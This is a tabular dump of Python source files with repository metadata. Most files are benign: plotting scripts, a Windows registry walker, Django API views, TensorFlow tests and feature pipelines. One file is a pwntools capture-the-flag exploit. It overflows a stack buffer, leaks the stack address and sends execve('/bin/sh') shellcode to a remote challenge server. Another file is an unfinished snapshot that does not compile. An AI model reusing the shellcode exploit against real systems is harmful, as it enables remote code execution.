blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f92bdc62fa76b59090edc88420ad797e65e5b5b8
|
e17483ba000de9c6135e26ae6c09d9aa33004574
|
/ipynbs/流程控制/src/lock.py
|
527e33d048a10128a19edbe32bb8ce76108c1492
|
[
"Apache-2.0"
] |
permissive
|
HAOzj/TutorialForPython
|
27ae50c6b9fb3289ae7f67b8106d3d4996d145a7
|
df7a6db94b77f4861b11966399f5359d00911a16
|
refs/heads/master
| 2020-03-17T09:19:45.199165
| 2018-04-02T13:33:27
| 2018-04-02T13:33:27
| 133,470,105
| 1
| 0
| null | 2018-05-15T06:35:01
| 2018-05-15T06:35:01
| null |
UTF-8
|
Python
| false
| false
| 360
|
py
|
import multiprocessing
import sys
def worker_with(lock, f):
with lock:
with open(f,"a+") as fs:
fs.write('Lock acquired via with\n')
if __name__ == '__main__':
f = "source/file.txt"
lock = multiprocessing.Lock()
w = multiprocessing.Process(target=worker_with, args=(lock, f))
w.start()
w.join()
|
[
"hsz1273327@gmail.com"
] |
hsz1273327@gmail.com
|
ef81636e011ddbfe54443ed35eb0808243aee7ec
|
7e40c8bb28c2cee8e023751557b90ef7ef518326
|
/pwnable_start/start.py
|
a51348673cc5407c52bddaa973546e1794ed2e67
|
[] |
no_license
|
1337536723/buuctf_pwn
|
b6e5d65372ed0638a722faef1775026a89321fa3
|
cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf
|
refs/heads/master
| 2023-08-29T19:35:04.352530
| 2021-11-16T14:06:20
| 2021-11-16T14:06:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 483
|
py
|
from pwn import *
context.log_level = "debug"
#p = process('./start')
p = remote('node4.buuoj.cn', 28412)
call_write = 0x8048087
payload = b'a' * 0x14 + p32(call_write)
p.sendafter(b"Let's start the CTF:", payload)
esp = u32(p.recv(4))
print('esp -> {}'.format(hex(esp)))
shellcode='''
xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
xor edx,edx
mov ebx,esp
mov al,0xb
int 0x80
'''
payload = b'a' * 0x14 + p32(esp + 0x14) + asm(shellcode)
p.send(payload)
p.interactive()
|
[
"admin@srmxy.cn"
] |
admin@srmxy.cn
|
fe351d2472b7dbfcf0af804a27e8f390c8ff6337
|
4ddf82eeb31d46fb67802a4375390eb42a8f23b8
|
/tests/misc/sys_settrace_subdir/trace_generic.py
|
111a9d19ff30dda48e0212bcf758d99032cd8a9c
|
[
"MIT"
] |
permissive
|
pulkin/micropython
|
1437a507b9e90c8824e80c3553e6209d89e64565
|
c274c947c611f510fd2b1c4ef6cbd9f4283794fc
|
refs/heads/master
| 2023-03-08T02:35:28.208819
| 2022-04-19T12:38:47
| 2022-04-19T12:38:47
| 167,732,676
| 103
| 36
|
MIT
| 2023-02-25T03:02:36
| 2019-01-26T19:57:59
|
C
|
UTF-8
|
Python
| false
| false
| 1,540
|
py
|
print("Now comes the language constructions tests.")
# function
def test_func():
def test_sub_func():
print("test_function")
test_sub_func()
# closure
def test_closure(msg):
def make_closure():
print(msg)
return make_closure
# exception
def test_exception():
try:
raise Exception("test_exception")
except Exception:
pass
finally:
pass
# listcomp
def test_listcomp():
print("test_listcomp", [x for x in range(3)])
# lambda
def test_lambda():
func_obj_1 = lambda a, b: a + b
print(func_obj_1(10, 20))
# import
def test_import():
from sys_settrace_subdir import trace_importme
trace_importme.dummy()
trace_importme.saysomething()
# class
class TLClass:
def method():
pass
pass
def test_class():
class TestClass:
__anynum = -9
def method(self):
print("test_class_method")
self.__anynum += 1
def prprty_getter(self):
return self.__anynum
def prprty_setter(self, what):
self.__anynum = what
prprty = property(prprty_getter, prprty_setter)
cls = TestClass()
cls.method()
print("test_class_property", cls.prprty)
cls.prprty = 12
print("test_class_property", cls.prprty)
def run_tests():
test_func()
test_closure_inst = test_closure("test_closure")
test_closure_inst()
test_exception()
test_listcomp()
test_lambda()
test_class()
test_import()
print("And it's done!")
|
[
"damien.p.george@gmail.com"
] |
damien.p.george@gmail.com
|
48853301e1d5994fd62e2e7ac0424f3762a446ea
|
3a4fbde06794da1ec4c778055dcc5586eec4b7d2
|
/@lib/01-18-2008-01/vyperlogix/win/registry/reg_walker.py
|
cc8b06833bd146af47d7804a83c6d80b046dc6b6
|
[] |
no_license
|
raychorn/svn_python-django-projects
|
27b3f367303d6254af55c645ea003276a5807798
|
df0d90c72d482b8a1e1b87e484d7ad991248ecc8
|
refs/heads/main
| 2022-12-30T20:36:25.884400
| 2020-10-15T21:52:32
| 2020-10-15T21:52:32
| 304,455,211
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,134
|
py
|
import _winreg
__copyright__ = """\
(c). Copyright 2008-2011, Vyper Logix Corp., All Rights Reserved.
Published under Creative Commons License
(http://creativecommons.org/licenses/by-nc/3.0/)
restricted to non-commercial educational use only.,
http://www.VyperLogix.com for details
THE AUTHOR VYPER LOGIX CORP DISCLAIMS ALL WARRANTIES WITH REGARD TO
THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !
USE AT YOUR OWN RISK.
"""
def walk(top, writeable=False):
"""walk the registry starting from the key represented by
top in the form HIVE\\key\\subkey\\..\\subkey and generating
(key_name, key), subkey_names, values at each level.
subkey_names are simply names of the subkeys of that key
values are 3-tuples containing (name, data, data-type).
See the documentation for _winreg.EnumValue for more details.
"""
keymode = _winreg.KEY_READ
if writeable:
keymode |= _winreg.KEY_SET_VALUE
if "\\" not in top: top += "\\"
root, subkey = top.split ("\\", 1)
try:
key = _winreg.OpenKey (getattr (_winreg, root), subkey, 0, keymode)
except:
key = None
subkeys = []
if (key):
i = 0
while True:
try:
subkeys.append (_winreg.EnumKey (key, i))
i += 1
except EnvironmentError:
break
values = []
if (key):
i = 0
while True:
try:
values.append (_winreg.EnumValue (key, i))
i += 1
except EnvironmentError:
break
yield (top, key), subkeys, values
for subkey in subkeys:
for result in walk (top.rstrip ("\\") + "\\" + subkey, writeable):
yield result
|
[
"raychorn@gmail.com"
] |
raychorn@gmail.com
|
c7dfc7725d763e85132830b5dcd849e65bf137c2
|
bf0d7c8d987d5fda14208eb9ce70e31c83c25c25
|
/c-ex4/plot_logs.py
|
6151e8784b9f8a3d48023b055e5894d81ed693d0
|
[] |
no_license
|
SummerBigData/SamRepo
|
7876e9393c7175e300e175a60c17633c3b23a1bb
|
fd84ad654370faa48c084349952c2921fde4032d
|
refs/heads/master
| 2020-03-18T05:09:08.787956
| 2018-06-18T17:11:49
| 2018-06-18T17:11:49
| 134,327,137
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,894
|
py
|
import numpy as np
import pandas as pd
from plotly.offline import plot
import plotly.graph_objs as go
import os
dirs = os.listdir('logs')
dirs = list(filter(lambda f: os.path.isdir('logs/'+f), dirs))
data = dict()
for name in dirs:
if not os.path.isfile('logs/'+name+'/cost_and_acc.csv'):
print name + ' does not have cost.csv'
continue
df = pd.read_csv('logs/'+name+'/cost_and_acc.csv')
if len(df['Cost'].as_matrix()) == 0:
continue
data[name] = (df['Cost'].as_matrix(), df[' Accuracy'].as_matrix())
for name, (cost, acc) in data.items():
if len(cost) < 3:
continue
data = [
go.Scatter(x=list(range(len(cost))),
y=cost,
mode='lines+markers',
name='Cost'),
go.Scatter(x=list(range(len(acc))),
y=acc,
mode='lines+markers',
name='Accuracy')
]
layout = go.Layout(
title=name,
xaxis=dict(title='Iteration * 20'),
yaxis=dict(title='Metric Value')
)
plot({'data': data, 'layout': layout}, filename='plots/'+name+'_metrics.html')
"""
cost_traces = []
acc_traces = []
for name, (cost, acc) in data.items():
cost_traces.append(
go.Scatter(
x=list(range(len(cost))),
y=cost,
mode='lines+markers',
name=name))
acc_traces.append(
go.Scatter(
x=list(range(len(acc))),
y=acc,
mode='lines+markers',
name=name))
layout = go.Layout(
title='Cost over Time',
xaxis=dict(title='Iteration * 20'),
yaxis=dict(title='Cost'))
plot({'data': cost_traces, 'layout': layout}, filename='costs.html')
layout = go.Layout(
title='Accuracy over Time',
xaxis=dict(title='Iteration * 20'),
yaxis=dict(title='Accuracy'))
plot({'data': acc_traces, 'layout': layout}, filename='accs.html')
"""
|
[
"lerner98@gmail.com"
] |
lerner98@gmail.com
|
4f5bd2145ed1e3def380adc78118dd2eac97e1b4
|
d66141796bcaf9b1f895be0226f7400ca8d579cf
|
/color_histogram/core/hist_common.py
|
8804159b85f6d765fc442976f017235e42123ff9
|
[
"MIT"
] |
permissive
|
absbin/ColorHistogram
|
51004ca4bad2b83ff9f496cb6097d654fa30583f
|
0743376d5d89d4c8aacc986bb3d64a0098877480
|
refs/heads/master
| 2020-04-21T17:37:15.035363
| 2019-02-10T19:50:09
| 2019-02-10T19:50:09
| 169,741,939
| 0
| 0
|
MIT
| 2019-02-08T13:51:22
| 2019-02-08T13:51:22
| null |
UTF-8
|
Python
| false
| false
| 1,733
|
py
|
# -*- coding: utf-8 -*-
## @package color_histogram.core.hist_common
#
# Common color histogram functions for 1D, 2D, 3D.
# @author tody
# @date 2015/08/29
import numpy as np
def colorCoordinates(color_ids, num_bins, color_range):
color_ids = np.array(color_ids).T
c_min, c_max = color_range
color_coordinates = c_min + (color_ids * (c_max - c_min)) / float(num_bins - 1.0)
return color_coordinates
def colorDensities(hist_bins):
hist_positive = hist_bins > 0.0
color_densities = np.float32(hist_bins[hist_positive])
density_max = np.max(color_densities)
color_densities = color_densities / density_max
return color_densities
def rgbColors(hist_bins, color_bins):
hist_positive = hist_bins > 0.0
colors = color_bins[hist_positive, :]
colors = np.clip(colors, 0.0, 1.0)
return colors
def clipLowDensity(hist_bins, color_bins, alpha):
density_mean = np.mean(hist_bins)
low_density = hist_bins < density_mean * alpha
hist_bins[low_density] = 0.0
for ci in xrange(3):
color_bins[low_density, ci] = 0.0
def densitySizes(color_densities, density_size_range):
density_size_min, density_size_max = density_size_range
density_size_factor = density_size_max / density_size_min
density_sizes = density_size_min * np.power(density_size_factor, color_densities)
return density_sizes
def range2ticks(tick_range, decimals=1):
ticks = np.around(tick_range, decimals=decimals)
ticks[ticks > 10] = np.rint(ticks[ticks > 10])
return ticks
def range2lims(tick_range):
unit = 0.1 * (tick_range[:, 1] - tick_range[:, 0])
lim = np.array(tick_range)
lim[:, 0] += -unit
lim[:, 1] += unit
return lim
|
[
"tody411@gmail.com"
] |
tody411@gmail.com
|
81519b9144aeb9c939806eb0d2d04dafbbf4b122
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/sets_20200609191647.py
|
c8142142fb9e8aff031b9767f3c3d70a3fcfbf5a
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,131
|
py
|
import json
def Strings(str):
# dictionary--> key value pairs
values = {}
newArray = []
keys = []
for i in str:
newArray.append(i.split(":"))
for j in range(0,len(newArray)):
if newArray[j][0] in values:
values[j][0] += int(newArray[j][1])
else:
values[j][0].append(in)
# values[j][0] = int(newArray[j][1])
# if newArray[j][0] in values:
# values[newArray[j][0]] += int(newArray[j][1])
# else:
# values[newArray[j][0]] = int(newArray[j][1])
# for k in values:
# keys.append(k)
# keys = sorted(keys)
# newString = ""
# last =len(keys)-1
# lastString = ""
# lastString +=keys[last] + ":" + json.dumps(values[keys[last]])
# for i in range(len(keys)-1):
# if keys[i] in values:
# newString += keys[i] + ":"+ json.dumps(values[keys[i]])+","
# finalString = newString + lastString
# print(type(finalString))
Strings(["Z:1","B:3","C:3","Z:4","B:2"])
# "B:5,C:3,Z:5"
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
ba97fb24529d7aa94bd21ccf716216cc351abd99
|
3437c90948fef98f3db081b741b96d50666b2a39
|
/api/views.py
|
0164884433e2f10716eb991bd19c55e9dfe8d968
|
[] |
no_license
|
jimrollenhagen/WhatManager3
|
897080e5125c0bbb5bce8366b0eb5ca1118e1bc8
|
fb14b3527f6263045471fdd48384f1f7007c5bc0
|
refs/heads/master
| 2020-12-03T10:26:34.324705
| 2014-10-22T05:03:10
| 2014-10-21T21:57:12
| 25,735,775
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,477
|
py
|
# Create your views here.
from django.http.response import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from api.management import ApiManager
from torrents.client import TorrentManagerException
from torrents.models import ClientTorrent
from trackers.client import TrackerManagerException
from trackers.loader import get_tracker_torrent_model
@csrf_exempt
@require_POST
def add_torrent(request):
tracker = request.POST['tracker']
torrent_id = request.POST['torrent_id']
client = ApiManager()
try:
client.add_torrent(tracker, torrent_id)
except TrackerManagerException as e:
return JsonResponse(e.__dict__)
except TorrentManagerException as e:
return JsonResponse(e.__dict__)
return JsonResponse({'success': True})
@csrf_exempt
@require_POST
def delete_torrent(request):
info_hash = request.POST.get('info_hash')
tracker = request.POST.get('tracker')
torrent_id = request.POST.get('torrent_id')
client = ApiManager()
try:
client.delete_torrent(info_hash, tracker, torrent_id)
except TrackerManagerException as e:
return JsonResponse(e.__dict__)
except TorrentManagerException as e:
return JsonResponse(e.__dict__)
return JsonResponse({'success': True})
def torrents_status(request):
requested = {}
if 'info_hashes' in request.GET:
info_hashes = request.GET['info_hashes'].split(',')
for info_hash in info_hashes:
requested[info_hash] = info_hash
if 'tracker' in request.GET and 'ids' in request.GET:
ids = request.GET['ids'].split(',')
model = get_tracker_torrent_model(request.GET['tracker'])
for t in model.objects.filter(id__in=ids).only('id', 'info_hash'):
requested[t.id] = t.info_hash
torrents = {
t.info_hash: t for t in ClientTorrent.objects.filter(info_hash__in=requested.values())
}
statuses = {}
for key, info_hash in requested.items():
torrent = torrents.get(info_hash)
if torrent is None:
statuses[key] = {
'status': 'missing',
}
elif torrent.done < 1:
statuses[key] = {
'status': 'downloading',
'progress': torrent.done,
}
else:
statuses[key] = {
'status': 'downloaded',
}
return JsonResponse(statuses)
|
[
"ivailo@karamanolev.com"
] |
ivailo@karamanolev.com
|
d2ca79b04e4f33f3da1aacc21ab5523ec50d6cc0
|
6fa625feb79934951985ddfa3889886abbe0dc8e
|
/crawlers/ddgmuiWyoming/wyoming.py
|
29a664e5f3caed892131c88183e08f5b65b083ba
|
[] |
no_license
|
anukaisolutions/Vayudev
|
b539ab085aac1fd285953289f7bff9b47bfeb080
|
905f749d1678ab36211b1ead1dd005ce03221d72
|
refs/heads/master
| 2021-01-13T19:16:41.775458
| 2020-02-23T14:06:50
| 2020-02-23T14:06:50
| 242,467,839
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 773
|
py
|
def getData(year,month,form1,to,statio):
url = "http://weather.uwyo.edu/cgi-bin/sounding?region=seasia&TYPE=TEXT%3ARAW&YEAR="+year+"&MONTH="+month+"&FROM="+from1+"&TO="+to+"&STNM="+station
import requests
response = requests.get(url)
response = str(response.content)
# print(response.content)
name = "wyomingData/"+station+".txt"
file = open(name,'w')
for i in response[3:-1]:
if(i == '\\'):
file.write("\n")
elif(i == 'n'):
continue
else:
file.write(i)
file.close()
year = "2019"
month = "3"
from1 = "2700"
to = "2700"
stationCodes = ['42707','42101','42182','42339','42361','42379','42299','42314']
for station in stationCodes:
getData(year,month,from1,to,station)
|
[
"rahulgoyal0.rg@gmail.com"
] |
rahulgoyal0.rg@gmail.com
|
4bc1e9b731c78cf2eade21f26145cd1de06357af
|
49536aafb22a77a6caf249c7fadef46d63d24dfe
|
/tensorflow/tensorflow/contrib/learn/python/learn/estimators/rnn_common_test.py
|
5df08f5fdc138fbb912f8ebcd33bc37ce60bc5d2
|
[
"Apache-2.0"
] |
permissive
|
wangzhi01/deeplearning-1
|
4e5ad93f0d9ecd302b74352f80fe1fa6ae70bf0d
|
46ab82253d956953b8aa98e97ceb6cd290e82288
|
refs/heads/master
| 2020-05-28T03:14:55.687567
| 2018-09-12T16:52:09
| 2018-09-12T16:52:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,952
|
py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for layers.rnn_common."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.learn.python.learn.estimators import rnn_common
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.platform import test
class RnnCommonTest(test.TestCase):
def testMaskActivationsAndLabels(self):
"""Test `mask_activations_and_labels`."""
batch_size = 4
padded_length = 6
num_classes = 4
np.random.seed(1234)
sequence_length = np.random.randint(0, padded_length + 1, batch_size)
activations = np.random.rand(batch_size, padded_length, num_classes)
labels = np.random.randint(0, num_classes, [batch_size, padded_length])
(activations_masked_t,
labels_masked_t) = rnn_common.mask_activations_and_labels(
constant_op.constant(activations, dtype=dtypes.float32),
constant_op.constant(labels, dtype=dtypes.int32),
constant_op.constant(sequence_length, dtype=dtypes.int32))
with self.test_session() as sess:
activations_masked, labels_masked = sess.run(
[activations_masked_t, labels_masked_t])
expected_activations_shape = [sum(sequence_length), num_classes]
np.testing.assert_equal(
expected_activations_shape, activations_masked.shape,
'Wrong activations shape. Expected {}; got {}.'.format(
expected_activations_shape, activations_masked.shape))
expected_labels_shape = [sum(sequence_length)]
np.testing.assert_equal(expected_labels_shape, labels_masked.shape,
'Wrong labels shape. Expected {}; got {}.'.format(
expected_labels_shape, labels_masked.shape))
masked_index = 0
for i in range(batch_size):
for j in range(sequence_length[i]):
actual_activations = activations_masked[masked_index]
expected_activations = activations[i, j, :]
np.testing.assert_almost_equal(
expected_activations,
actual_activations,
err_msg='Unexpected logit value at index [{}, {}, :].'
' Expected {}; got {}.'.format(i, j, expected_activations,
actual_activations))
actual_labels = labels_masked[masked_index]
expected_labels = labels[i, j]
np.testing.assert_almost_equal(
expected_labels,
actual_labels,
err_msg='Unexpected logit value at index [{}, {}].'
' Expected {}; got {}.'.format(i, j, expected_labels,
actual_labels))
masked_index += 1
def testSelectLastActivations(self):
"""Test `select_last_activations`."""
batch_size = 4
padded_length = 6
num_classes = 4
np.random.seed(4444)
sequence_length = np.random.randint(0, padded_length + 1, batch_size)
activations = np.random.rand(batch_size, padded_length, num_classes)
last_activations_t = rnn_common.select_last_activations(
constant_op.constant(activations, dtype=dtypes.float32),
constant_op.constant(sequence_length, dtype=dtypes.int32))
with session.Session() as sess:
last_activations = sess.run(last_activations_t)
expected_activations_shape = [batch_size, num_classes]
np.testing.assert_equal(
expected_activations_shape, last_activations.shape,
'Wrong activations shape. Expected {}; got {}.'.format(
expected_activations_shape, last_activations.shape))
for i in range(batch_size):
actual_activations = last_activations[i, :]
expected_activations = activations[i, sequence_length[i] - 1, :]
np.testing.assert_almost_equal(
expected_activations,
actual_activations,
err_msg='Unexpected logit value at index [{}, :].'
' Expected {}; got {}.'.format(i, expected_activations,
actual_activations))
if __name__ == '__main__':
test.main()
|
[
"hanshuobest@163.com"
] |
hanshuobest@163.com
|
62bca78d93bc3f22a19ac5decef2c0c10190c48a
|
5f36eba5cf27cda8198cad11f0486d379a5ca9f0
|
/gen_features.py
|
f35b063158b60ce886115751c8f5d62fdfe819e8
|
[
"MIT"
] |
permissive
|
A-Jacobson/iEEG_Seizure_Prediction
|
16354a67cb5c429935d1ce00f1c1647349ddb9ea
|
bdee7f4aab72674e01af7ec254b5d6ec7f65e620
|
refs/heads/master
| 2020-07-06T13:05:46.155605
| 2016-09-16T22:02:19
| 2016-09-16T22:02:19
| 67,307,587
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,760
|
py
|
from pipeline import Pipeline
from eeg_io import load_data
from transforms import *
import multiprocessing as mp
pipelines = [
# statstical features
Pipeline([Mean()]),
Pipeline([Mean(), Abs()]),
Pipeline([Abs(), Mean()]),
Pipeline([Stats()]),
Pipeline([CorrelationMatrix()]),
# Pipeline([CorrelationMatrix(), Eigenvalues()]), # under construction
# time domain features
Pipeline([Resample(600)]),
Pipeline([LPF(5.0), Resample(600)]),
Pipeline([LPF(5.0), Interp(), Resample(600)]),
Pipeline([Interp(), Resample(600)]),
Pipeline([Resample(1200)]),
Pipeline([LPF(5.0), Resample(1200)]),
Pipeline([Interp(), Resample(1200)]),
# frequency domain features
Pipeline([FFT(), Slice(1, 48), Magnitude(), Log10()]),
Pipeline([FFT(), Slice(1, 64), Magnitude(), Log10()]),
Pipeline([FFT(), Slice(1, 96), Magnitude(), Log10()]),
Pipeline([FFT(), Slice(1, 128), Magnitude(), Log10()]),
Pipeline([FFT(), Slice(1, 160), Magnitude(), Log10()]),
# combination features (under construction)
# Pipeline([FFTWithTimeFreqCorrelation(1, 48, 400, 'usf')]),
# Pipeline([FFTWithTimeFreqCorrelation(1, 48, 400, 'usf')]),
# Image features
#Pipeline([SpectrogramImage(size=(224, 224, 3))]) # under construction
]
folders = ['train_1', 'test_1', 'train_2', 'test_2', 'train_3', 'test_3']
def gen_features(folder):
if 'train' in folder:
for p in pipelines:
X, y, files = load_data(folder)
p.to_file(X, files, folder, y)
else:
for p in pipelines:
X, files = load_data(folder)
p.to_file(X, files, folder)
if __name__ == '__main__':
processes = 6
p = mp.Pool(processes)
p.map(gen_features, folders)
|
[
"jacobsonaustinj@gmail.com"
] |
jacobsonaustinj@gmail.com
|
505e010e347cb6852cbd67ae05cfa5a801a854ef
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/88/usersdata/197/59698/submittedfiles/listas.py
|
42280df62eb2e1e110c8e6ea113e2b5f83248d61
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 557
|
py
|
# -*- coding: utf-8 -*-
def degrau (a):
b=[]
for i in range (0,len(a)-1,1):
diferenca=(-1)*(a[i]-a[i+1])
b.append(diferenca)
return (b)
def maior (a):
maior=a[0]
for i in range (0,len(a),1):
if a[i]>maior:
maior=a[i]
return (maior)
def maiordegrau (lista):
b=degrau(lista)
m=maior(b)
return(m)
lista=[]
n=int(input('Digite o numero de elementos da lista:'))
for i in range (1,n+1,1):
valor=float(input('Digite o numero da lista:'))
lista.append(valor)
print(maiordegrau(lista))
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
f4ffb83165231227b2683d436abb21d63dea3822
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/q7BdzRw4j7zFfFb4R_16.py
|
f9daf2b8e0b3ec99b99073498e00d7020dc7733f
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,028
|
py
|
"""
Create a function that takes two lists and combines them by alternatingly
taking elements from each list in turn.
* The lists may be of different lengths, with at least one character / digit.
* The first list will contain string characters (lowercase, a-z).
* The second list will contain integers (all positive).
### Examples
merge_arrays(["a", "b", "c", "d", "e"], [1, 2, 3, 4, 5])
➞ ["a", 1, "b", 2, "c", 3, "d", 4, "e", 5]
merge_arrays([1, 2, 3], ["a", "b", "c", "d", "e", "f"])
➞ [1, "a", 2, "b", 3, "c", "d", "e", "f"]
merge_arrays(["f", "d", "w", "t"], [5, 3, 7, 8])
➞ ["f", 5, "d", 3, "w", 7, "t", 8]
### Notes
N/A
"""
def merge_arrays(a, b):
a_copy = list(a)
b_copy = list(b)
c = list()
if len(a) > len(b):
long_list = list(a)
else:
long_list = list(b)
for i in range(len(long_list)):
if a_copy:
c.append(a_copy.pop(0))
if b_copy:
c.append(b_copy.pop(0))
return c
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
a9afdee321162791bb14de296c179bfd662c9631
|
46c31992b665615e410f1869b9f7a91ed57a2637
|
/couchbase/tests/cases/rget_t.py
|
c7a8cd4db499d9584d590617ed33a4396847008a
|
[
"Apache-2.0"
] |
permissive
|
what-studio/couchbase-python-client
|
4bca31917a519ad2d61bc93f37faa7f4af81d32d
|
1aa78f1559fe2407d664b7d5fd1f885359750147
|
refs/heads/master
| 2021-01-12T08:34:06.866811
| 2016-12-02T00:05:15
| 2016-12-02T16:31:24
| 76,612,814
| 1
| 1
| null | 2016-12-16T02:09:30
| 2016-12-16T02:09:29
| null |
UTF-8
|
Python
| false
| false
| 3,351
|
py
|
#
# Copyright 2013, Couchbase, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from couchbase.exceptions import NotFoundError, ArgumentError
from couchbase.tests.base import MockTestCase
from couchbase.mockserver import MockControlClient
class ReplicaGetTest(MockTestCase):
def setUp(self):
super(ReplicaGetTest, self).setUp()
self.skipUnlessMock()
self.skipLcbMin("2.0.7")
self.mockclient = MockControlClient(self.mock.rest_port)
def test_get_kw(self):
key = self.gen_key("get_kw")
# Set on all replicas
self.mockclient.cache(key,
on_master=False,
replica_count=self.mock.replicas,
value=99,
cas=1234)
self.assertRaises(NotFoundError,
self.cb.get, key)
rv = self.cb.get(key, replica=True)
self.assertTrue(rv.success)
self.assertEqual(rv.value, 99)
def _check_single_replica(self, ix):
key = self.gen_key("get_kw_ix")
# Ensure the key is removed...
self.mockclient.purge(key,
on_master=True,
replica_count=self.mock.replicas)
# Getting it should raise an error
self.assertRaises(NotFoundError, self.cb.get, key)
# So should getting it from any replica
self.assertRaises(NotFoundError, self.cb.rget, key)
# And so should getting it from a specific index
for jx in range(self.mock.replicas):
self.assertRaises(NotFoundError, self.cb.rget, key,
replica_index=jx)
# Store the key on the desired replica
self.mockclient.cache(key,
on_master=False,
replicas=[ix],
value=ix,
cas=12345)
# Getting it from a replica should ultimately succeed
self.cb.get(key, replica=True)
rv = self.cb.rget(key)
self.assertTrue(rv.success)
self.assertEqual(rv.value, ix)
# Getting it from our specified replica should succeed
rv = self.cb.rget(key, replica_index=ix)
self.assertTrue(rv.success)
self.assertEqual(rv.value, ix)
# Getting it from any other replica should fail
for jx in range(self.mock.replicas):
if jx == ix:
continue
self.assertRaises(NotFoundError,
self.cb.rget,
key,
replica_index=jx)
def test_get_ix(self):
key = self.gen_key("get_kw_ix")
for ix in range(self.mock.replicas):
self._check_single_replica(ix)
|
[
"mnunberg@haskalah.org"
] |
mnunberg@haskalah.org
|
43196f723a7336bcf3a95d9474d07b8fbaf707fd
|
e72c937f783e79f41468d992fead4e2085de1775
|
/src/week 4/day 3/using_object_main.py
|
159e6f58b74160936df6aa2ce755b28005e8a72b
|
[] |
no_license
|
NoroffNIS/Python_Examples
|
13dac7313472a9cdefe66a61302f4024a4a8af0f
|
ffab09002d3549e6f440a303fccc0fd61bb80472
|
refs/heads/master
